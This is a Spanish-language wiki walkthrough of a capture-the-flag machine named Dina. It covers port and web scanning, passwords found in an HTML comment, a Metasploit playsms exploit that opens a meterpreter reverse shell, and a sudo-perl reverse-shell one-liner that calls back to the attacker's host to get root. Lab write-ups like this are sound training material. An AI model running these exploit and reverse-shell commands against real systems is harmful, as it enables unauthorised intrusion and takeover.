-
Notifications
You must be signed in to change notification settings - Fork 1
diana
danielcastropalomares edited this page Nov 17, 2018
·
2 revisions
Con un primer escaneo de puertos, vemos que solo tiene abierto el puerto 80:
root@kali:~# nmap -p- 172.31.255.124
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-17 10:49 CET
Nmap scan report for 172.31.255.124
Host is up (0.00015s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
Escanemos el directorio web:
root@kali:~# dirhunt http://172.31.255.124
Welcome to Dirhunt v0.6.0 using Python 3.6.7
[301] http://172.31.255.124/angel1 (Redirect)
Redirect to: http://172.31.255.124/angel1/
[301] http://172.31.255.124/nothing (Redirect)
Redirect to: http://172.31.255.124/nothing/
[301] http://172.31.255.124/ange1 (Redirect)
Redirect to: http://172.31.255.124/ange1/
[301] http://172.31.255.124/tmp (Redirect)
Redirect to: http://172.31.255.124/tmp/
[200] http://172.31.255.124/angel1/ (Index Of) (Nothing interesting)
[200] http://172.31.255.124/ange1/ (Index Of) (Nothing interesting)
[301] http://172.31.255.124/uploads (Redirect)
Redirect to: http://172.31.255.124/uploads/
[200] http://172.31.255.124/tmp/ (Index Of) (Nothing interesting)
[200] http://172.31.255.124/ (HTML document)
Index file found: index.html
[200] http://172.31.255.124/uploads/ (Index Of) (Nothing interesting)
[200] http://172.31.255.124/nothing/ (HTML document)
Index file found: index.html
◰ Finished after 2 seconds
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
root@kali:~# nikto -C a -host 172.31.255.124
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.124
+ Target Hostname: 172.31.255.124
+ Target Port: 80
+ Start Time: 2018-11-17 10:51:32 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8328 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2018-11-17 10:51:48 (GMT1) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Si inspeccionamos el código dentro de la página nothing encontramos una serie de passwords:
http://172.31.255.124/nothing/
<!--#my secret pass freedom password helloworld! diana iloveroot -->
Dentro de la página secure, hallamos un fichero .zip llamado backup:
http://172.31.255.124/secure/
[ICO] Name Last modified Size Description
[DIR] Parent Directory -
[ ] backup.zip 17-Oct-2017 18:59 336
Al intentar descomprimirlo nos pide un password, el password es freedom (del listado anterior de passwords):
backup-cred.mp3
Dentro del fichero encontramos el siguiente contenido:
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
Accedemos vía web a la URL que nos indica en el fichero anterior y como password utilizamos una de las credenciales del fichero backup-cred:
http://172.31.255.124/SecreTSMSgatwayLogin
touhid
diana
Vamos a utilizar el exploit de inyección de codigo de playsms:
msf > use exploit/multi/http/playsms_filename_exec
msf exploit(multi/http/playsms_filename_exec) > set RHOST 172.31.255.124
msf exploit(multi/http/playsms_filename_exec) > set LHOST 172.31.255.141
msf exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
msf exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
msf exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
Ejecutamos el exploit y ya estamos dentro:
msf exploit(multi/http/playsms_filename_exec) > exploit
[*] Started reverse TCP handler on 172.31.255.141:4444
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38247 bytes) to 172.31.255.124
[*] Meterpreter session 1 opened (172.31.255.141:4444 -> 172.31.255.124:41070) at 2018-11-17 22:33:32 +0100
Abrimos una shell con python:
meterpreter > shell
Process 2788 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
Lo primero que revisamos son los permisos de sudo, y vemos que el binario perl se puede ejecutar con sudo sin password:
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
sudo -l
Matching Defaults entries for www-data on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/perl
Aprovechando el binario perl, vamos a abrir un reverse shell. En nuestro Kali linux escucharemos por el puerto 443:
nc -vlp 443
En la maquina victima abriremos una reverse shell, especificando la IP de nuestra máquina Kali:
sudo perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.141:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
En la maquina Kali veremos una nueva sesión abierta ahora con el usuario root:
172.31.255.124: inverse host lookup failed: Unknown host
connect to [172.31.255.141] from (UNKNOWN) [172.31.255.124] 36998
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@Dina:/var/www/SecreTSMSgatwayLogin#
Ahora ya podemos listar el directorio root y leer el fichero que contiene la flag:
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
cd /root
root@Dina:~# ls
ls
flag.txt
root@Dina:~# cat flag.txt
cat flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))
root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....
CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6